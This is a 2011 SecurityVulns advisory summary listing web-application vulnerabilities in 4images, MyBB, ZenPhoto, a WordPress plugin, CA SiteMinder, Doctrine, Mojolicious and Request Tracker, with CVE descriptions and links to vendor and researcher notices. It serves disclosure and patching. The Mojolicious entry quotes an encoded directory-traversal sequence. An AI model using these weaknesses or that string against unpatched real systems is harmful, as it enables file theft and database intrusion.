Computer Security
[EN] securityvulns.ru no-pyccku


Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:21.04.2011
Source:
SecurityVulns ID:11609
Type:remote
Threat Level:
5/10
Description:PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
Affected:4HOMEPAGES : 4images 1.7
 MYBB : Mybb 1.6
 WORDPRESS : Ajax Category Dropdown 0.1
 ZENPHOTO : ZenPhoto 1.4
 CA : SiteMinder 6
 CA : SiteMinder 12
 DOCTRINE : doctrine 1.2
 LIBMOJOLICUS : libmojolicious 1.16
CVE:CVE-2011-1718 (The Web Agents component in CA SiteMinder R6 before SP6 CR2 and R12 before SP3 CR2 does not properly handle multi-line headers, which allows remote authenticated users to conduct impersonation attacks and gain privileges via crafted data.)
 CVE-2011-1690 (Best Practical Solutions RT 3.6.0 through 3.6.10 and 3.8.0 through 3.8.8 allows remote attackers to trick users into sending credentials to an arbitrary server via unspecified vectors.)
 CVE-2011-1689 (Multiple cross-site scripting (XSS) vulnerabilities in Best Practical Solutions RT 2.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.)
 CVE-2011-1688 (Directory traversal vulnerability in Best Practical Solutions RT 3.2.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allows remote attackers to read arbitrary files via a crafted HTTP request.)
 CVE-2011-1687 (Best Practical Solutions RT 3.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allows remote authenticated users to obtain sensitive information by using the search interface, as demonstrated by retrieving encrypted passwords.)
 CVE-2011-1686 (Multiple SQL injection vulnerabilities in Best Practical Solutions RT 2.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allow remote authenticated users to execute arbitrary SQL commands via unspecified vectors, as demonstrated by reading data.)
 CVE-2011-1685 (Best Practical Solutions RT 3.8.0 through 3.8.9 and 4.0.0rc through 4.0.0rc7, when the CustomFieldValuesSources (aka external custom field) option is enabled, allows remote authenticated users to execute arbitrary code via unspecified vectors, as demonstrated by a cross-site request forgery (CSRF) attack.)
 CVE-2011-1589 (Directory traversal vulnerability in Path.pm in Mojolicious before 1.16 allows remote attackers to read arbitrary files via a %2f..%2f (encoded slash dot dot slash) in a URI.)
 CVE-2011-1522 (Multiple SQL injection vulnerabilities in the Doctrine\DBAL\Platforms\AbstractPlatform::modifyLimitQuery function in Doctrine 1.x before 1.2.4 and 2.x before 2.0.3 allow remote attackers to execute arbitrary SQL commands via the (1) limit or (2) offset field.)
Original documentdocumentMustLive, Многочисленные уязвимости в MyBB (21.04.2011)
 documentDEBIAN, [SECURITY] [DSA 2221-1] Mojolicious security update (21.04.2011)
 documentDEBIAN, [SECURITY] [DSA 2223-1] doctrine security update (21.04.2011)
 documentCA, CA20110420-01: Security Notice for CA SiteMinder (21.04.2011)
 documentDEBIAN, [SECURITY] [DSA 2220-1] Request Tracker security update (21.04.2011)
 documentHigh-Tech Bridge Security Research, HTB22946: Multiple SQL Injection in Ajax Category Dropdown wordpress plugin (21.04.2011)
 documentHigh-Tech Bridge Security Research, HTB22945: Multiple XSS in ZENphoto (21.04.2011)
 documentHigh-Tech Bridge Security Research, HTB22950: SQL injection in 4images (21.04.2011)
 documentHigh-Tech Bridge Security Research, HTB22949: Multiple Path disclousure in 4images (21.04.2011)
 documentHigh-Tech Bridge Security Research, HTB22944: Path disclousure in ZENphoto (21.04.2011)
 documentHigh-Tech Bridge Security Research, HTB22947: XSS in Ajax Category Dropdown wordpress plugin (21.04.2011)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod